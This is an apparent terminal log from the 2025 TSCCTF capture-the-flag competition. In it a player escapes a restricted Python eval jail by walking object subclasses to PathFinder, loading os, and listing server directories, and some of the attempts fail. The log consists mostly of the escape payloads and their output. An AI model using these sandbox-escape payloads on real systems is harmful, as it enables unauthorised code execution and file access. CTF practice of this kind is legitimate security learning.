1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93
| ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os') <module 'os' from '/usr/local/lib/python3.12/os.py'> ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os').open('flag.txt', 'r').read() Traceback (most recent call last): File "/home/pyjail/jail.py", line 3, in <module> print(eval(input('> '), {"__builtins__": {}}, {})) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<string>", line 1, in <module> TypeError: 'str' object cannot be interpreted as an integer ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > __import__('os').system('cat ./flag.txt') Traceback (most recent call last): File "/home/pyjail/jail.py", line 3, in <module> print(eval(input('> '), {"__builtins__": {}}, {})) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<string>", line 1, in <module> NameError: name '__import__' is not defined ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > _\u200b_import\u200b_os\u200b.system\u200b('cat flag.txt') Traceback (most recent call last): File "/home/pyjail/jail.py", line 3, in <module> print(eval(input('> '), {"__builtins__": {}}, {})) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<string>", line 1 _\u200b_import\u200b_os\u200b.system\u200b('cat flag.txt') ^ SyntaxError: unexpected character after line continuation character ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os').listdir('/home/pyjail/') ['.bashrc', '.profile', '.bash_logout', 'jail.py', 'run.sh'] ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os').listdir('/home/pyjail/') ['.bashrc', '.profile', '.bash_logout', 'jail.py', 'run.sh'] ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os').listdir('/home/pyjail/data/')^[[ Traceback (most recent call last): File "/home/pyjail/jail.py", line 3, in <module> print(eval(input('> '), {"__builtins__": {}}, {})) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<string>", line 1 [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os').listdir( ^ SyntaxError: '(' was never closed ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os').listdir('/home') ['pyjail'] ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os').listdir('/') ['tmp', 'sbin', 'run', 'dev', 'boot', 'root', 'proc', 'media', 'lib', 'var', 'home', 'mnt', 'srv', 'etc', 'usr', 'bin', 'lib64', 'sys', 'opt', '.dockerenv', 'flag_LwAyYvKd'] ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os').listdir('/root') Traceback (most recent call last): File "/home/pyjail/jail.py", line 3, in <module> print(eval(input('> '), {"__builtins__": {}}, {})) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<string>", line 1, in <module> PermissionError: [Errno 13] Permission denied: '/root' ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os').listdir('/tmp') [] ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os').listdir('/usr') ['sbin', 'local', 'src', 'libexec', 'include', 'lib', 'bin', 'games', 'share'] ┌──(parallels㉿kali-linux-2024-2)-[~/Documents/2025TSCCTF] └─$ nc 172.31.3.2 8002 > [cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__ == 'PathFinder'][0].find_spec('os').loader.load_module('os').listdir('/usr/bin') ['cmp', 'toe', 'getconf', 'nsenter', 'sum', 'i386', 'basename', 'prlimit', 'linux32', 'passwd', 'scriptreplay', 'realpath', 'gpasswd', 'ldd', 'setarch', 'sha384sum', 'dpkg-split', 'shuf', 'ipcrm', 'apt-cdrom', 'zdump', 'deb-systemd-helper', 'which', 'nohup', 'tr', 'unlink', 'newgrp', 'env', 'dpkg-realpath', 'diff', 'debconf', 'join', 'tabs', 'mcookie', 'pinky', 'who', 'expr', 'reset', 'fincore', 'clear', 'awk', 'debconf-show', 'scriptlive', 'wc', 'flock', 'localedef', 'pathchk', 'lsmem', 'apt-config', 'apt-key', 'perl5.32.1', 'logger', 'namei', 'lslogins', 'getopt', 'bashbug', 'nice', 'numfmt', 'unexpand', 'setterm', 'base32', 'pager', 'tic', 'rev', 'head', 'dpkg', 'lastlog', 'chsh', 'clear_console', 'printf', 'gpgv', 'dirname', 'x86_64', 'chattr', 'unshare', 'setpriv', 'du', 'chcon', 'install', 'hostid', 'cut', 'tail', 'yes', 'cksum', 'dpkg-deb', 'addpart', 'update-alternatives', 'expand', 'lsns', 'mkfifo', 'dpkg-trigger', 'chage', 'setsid', 'fallocate', 'ptx', 'faillog', 'dpkg-query', 'infocmp', 'printenv', 'ipcs', 'uniq', 'tac', 'split', 'whereis', 'fold', 'debconf-escape', 'pr', 'sort', 'utmpdump', 'apt-mark', 'apt-cache', 'b2sum', 'stat', 'sdiff', 'nawk', 'perl', 'renice', 'nl', 'xargs', 'sha1sum', 'delpart', 'logname', 'nproc', 'catchsegv', '[', 'lsipc', 'sha224sum', 'md5sum', 'resizepart', 'deb-systemd-invoke', 'wall', 'comm', 'taskset', 'runcon', 'stdbuf', 'diff3', 'timeout', 'captoinfo', 'iconv', 'debconf-communicate', 'sha256sum', 'tee', 'users', 'shred', 'id', 'script', 'tset', 'find', 'savelog', 'locale', 'tzselect', 'csplit', 'tty', 'getent', 'seq', 'rgrep', 'factor', 'ischroot', 'sg', 'sha512sum', 'last', 'base64', 'dircolors', 'dpkg-maintscript-helper', 'link', 'ipcmk', 'partx', 'choom', 'chfn', 'pldd', 'dpkg-statoverride', 'fmt', 'md5sum.textutils', 'arch', 'apt-get', 'touch', 'whoami', 'lsattr', 'debconf-copydb', 'debconf-apt-progress', 'chrt', 'mesg', 'mawk', 'od', 'infotocap', 'test', 'truncate', 'ionice', 'paste', 'basenc', 'tsort', 'lastb', 'tput', 'dpkg-divert', 'linux64', 'debconf-set-selections', 'apt', 'expiry', 'lslocks', 'groups', 'lscpu', 'xconv.pl', 'dotlock', 'frm', 'movemail.mailutils', 'pstree', 'killall', 'frm.mailutils', 'itox', 'crontab', 'decodemail', 'mail.mailutils', 'from', 'mailq', 'sieve', 'movemail', 'readmsg', 'pslog', 'from.mailutils', 'messages.mailutils', 'readmsg.mailutils', 'messages', 'peekfd', 'mailx', 'dotlock.mailutils', 'pstree.x11', 'mail', 'mimeview', 'prtstat', 'newaliases', 'tcltk-depends', 'wish8.6', 'wish', 'tclsh8.6', 'tclsh', 'ncurses5-config', 'c++filt', 'x86_64-linux-gnu-gcc-ar-10', 'dpkg-shlibdeps', 'x86_64-linux-gnu-cpp-10', 'funzip', 'lzma', 'lzmainfo', 'dpkg-checkbuilddeps', 'nm', 'make', 'x86_64-linux-gnu-ld.gold', 'libwmf-config', 'glib-gettextize', 'x86_64-linux-gnu-dwp', 'automake-1.16', 'patch', 'dpkg-vendor', 'x86_64-linux-gnu-objcopy', 'elfedit', 'automake', 'unzip', 'c++', 'gencfu', 'x86_64-linux-gnu-readelf', 'x86_64-linux-gnu-gcov-dump-10', 'derb', 'dh_autotools-dev_restoreconfig', 'c99-gcc', 'identify-im6', 'c99', 'montage-im6', 'zipinfo', 'krb5-config.mit', 'x86_64-linux-gnu-strip', 'gcov-dump', 'fc-match', 'gcov', 'unzipsfx', 'fc-scan', 'dwp', 'ar', 'xml2-config', 'ld.bfd', 'autoreconf', 'animate', 'conjure-im6', 'mogrify', 'gio-querymodules', 'update-mime-database', 'size', 'dpkg-genchanges', 'gcc-ranlib', 'gapplication', 'fc-conflist', 'import-im6.q16', 'ncursesw5-config', 'pkgdata', 'objcopy', 'x86_64-linux-gnu-ranlib', 'gcc-nm-10', 'x86_64-linux-gnu-lto-dump-10', 'gdk-pixbuf-csource', 'makeconv', 'x86_64-linux-gnu-c++filt', 'ncurses6-config', 'import', 'unlzma', 'gcov-dump-10', 'fc-pattern', 'mogrify-im6', 'x86_64-linux-gnu-gcc', 'x86_64-linux-gnu-gcc-ranlib', 'x86_64-linux-gnu-gcc-ar', 'lzegrep', 'xzfgrep', 'conjure-im6.q16', 'c89-gcc', 'composite-im6', 'x86_64-linux-gnu-elfedit', 'fc-cat', 'x86_64-linux-gnu-gcov-tool-10', 'stream', 'compare-im6', 'gcc-ar-10', 'readelf', 'x86_64-linux-gnu-gcc-nm', 'dpkg-scansources', 'convert-im6', 'addr2line', 'gencat', 'x86_64-linux-gnu-gcov-dump', 'xzcmp', 'lzmore', 'X11', 'g++-10', 'fc-cache', 'gtester', 'x86_64-linux-gnu-ar', 'xzcat', 'x86_64-linux-gnu-as', 'dpkg-buildflags', 'import-im6', 'x86_64-linux-gnu-gcov', 'gdbus', 'strings', 'x86_64-linux-gnu-strings', 'dpkg-parsechangelog', 'display-im6.q16', 'convert', 'libpng-config', 'autoupdate', 'genbrk', 'genrb', 'composite', 'pkg-config', 'x86_64-linux-gnu-gcc-nm-10', 'objdump', 'dpkg-buildpackage', 'mysql_config', 'dpkg-source', 'conjure', 'x86_64-pc-linux-gnu-pkg-config', 'rpcgen', 'gresource', 'x86_64-linux-gnu-ld', 'aclocal', 'dpkg-architecture', 'cpp', 'gtester-report', 'dpkg-genbuildinfo', 'xzless', 'ranlib', 'display', 'dpkg-scanpackages', 'autom4te', 'montage', 'krb5-config', 'curl-config', 'x86_64-linux-gnu-g++-10', 'gcc-10', 'x86_64-linux-gnu-nm', 'x86_64-linux-gnu-addr2line', 'montage-im6.q16', 'fc-list', 'compare-im6.q16', 'gcc-nm', 'glib-genmarshal', 'x86_64-linux-gnu-gcc-10', 'dpkg-mergechangelogs', 'strip', 'file', 'x86_64-linux-gnu-g++', 'glib-mkenums', 'gdk-pixbuf-pixdata', 'x86_64-linux-gnu-ld.bfd', 'xz', 'c89', 'convert-im6.q16', 'zipgrep', 'm4', 'stream-im6.q16', 'lzcat', 'composite-im6.q16', 'animate-im6', 'g++', 'x86_64-linux-gnu-pkg-config', 'x86_64-linux-gnu-gcov-10', 'pcre-config', 'as', 'stream-im6', 'pcre2-config', 'fc-query', 'identify', 'gdbus-codegen', 'make-first-existing-target', 'x86_64-linux-gnu-gprof', 'glib-compile-resources', 'gcov-10', 'cc', 'identify-im6.q16', 'gprof', 'gcc-ranlib-10', 'x86_64-linux-gnu-cpp', 'x86_64-linux-gnu-objdump', 'mariadb_config', 'xzdiff', 'dh_autotools-dev_updateconfig', 'gcc', 'lto-dump-10', 'autoheader', 'aclocal-1.16', 'gcc-ar', 'gobject-query', 'gold', 'lzdiff', 'pg_config', 'dpkg-distaddfile', 'mariadb-config', 'cpp-10', 'x86_64-linux-gnu-gold', 'gendict', 'lzfgrep', 'libpng16-config', 'lzgrep', 'x86_64-linux-gnu-size', 'gmake', 'gsettings', 'xzegrep', 'lzcmp', 'gcov-tool-10', 'display-im6', 'autoconf', 'dpkg-gencontrol', 'dpkg-name', 'x86_64-linux-gnu-gcc-ranlib-10', 'fc-validate', 'compare', 'gcov-tool', 'xzgrep', 'gio', 'xzmore', 'glib-compile-schemas', 'gencnval', 'x86_64-linux-gnu-gcov-tool', 'xslt-config', 'icuinfo', 'uconv', 'compile_et', 'unxz', 'mogrify-im6.q16', 'libtoolize', 'ld', 'animate-im6.q16', 'dpkg-gensymbols', 'gdk-pixbuf-thumbnailer', 'autoscan', 'ifnames', 'ld.gold', 'lzless', 'ncursesw6-config', 'rsh', 'xsubpp', 'pwdx', 'perl5.32-x86_64-linux-gnu', 'svnbench', 'py3clean', 'sensible-browser', 'perlthanks', 'uptime', 'slogin', 'zipdetails', 'perlbug', 'svn', 'sensible-editor', 'lcf', 'pidwait', 'svnserve', 'py3compile', 'slabtop', 'piconv', 'ssh-keyscan', 'svnversion', 'pdb3', 'pydoc3', 'perldoc', 'ssh-copy-id', 'ucfq', 'svnauthz-validate', 'libnetcfg', 'ssh-argv0', 'ssh', 'python3.9', 'python3', 'py3versions', 'pod2html', 'git-upload-pack', 'git-shell', 'rlogin', 'svnsync', 'skill', 'pod2text', 'pgrep', 'json_pp', 'svndumpfilter', 'pl2pm', 'encguess', 'hg', 'pod2man', 'ptar', 'tload', 'pkill', 'cpan5.32-x86_64-linux-gnu', 'instmodsh', 'ucfr', 'watch', 'svnrdump', 'top', 'select-editor', 'ssh-add', 'w', 'splain', 'svnmucc', 'chg', 'ucf', 'pod2usage', 'pdb3.9', 'corelist', 'pydoc3.9', 'git-receive-pack', 'rcp', 'h2xs', 'podchecker', 'svnadmin', 'scp', 'streamzip', 'git', 'vmstat', 'pmap', 'pygettext3', 'ptardiff', 'snice', 'free', 'perlivp', 'svnauthz', 'shasum', 'hg-ssh', 'svnfsfs', 'pygettext3.9', 'ptargrep', 'h2ph', 'sensible-pager', 'svnlook', 'prove', 'cpan', 'enc2xs', 'sftp', 'ssh-keygen', 'ssh-agent', 'git-upload-archive', 'migrate-pubring-from-classic-gpg', 'gpgsm', 'pinentry-curses', 'dirmngr', 'c_rehash', 'gpgparsemail', 'wget', 'curl', 'gpgcompose', 'openssl', 'gpg', 'dirmngr-client', 'gpg-agent', 'gpgconf', 'gpg-zip', 'pinentry', 'kbxutil', 'gpgtar', 'watchgnupg', 'lspgpot', 'gpgsplit', 'gpg-connect-agent', 'gpg-wks-server']
|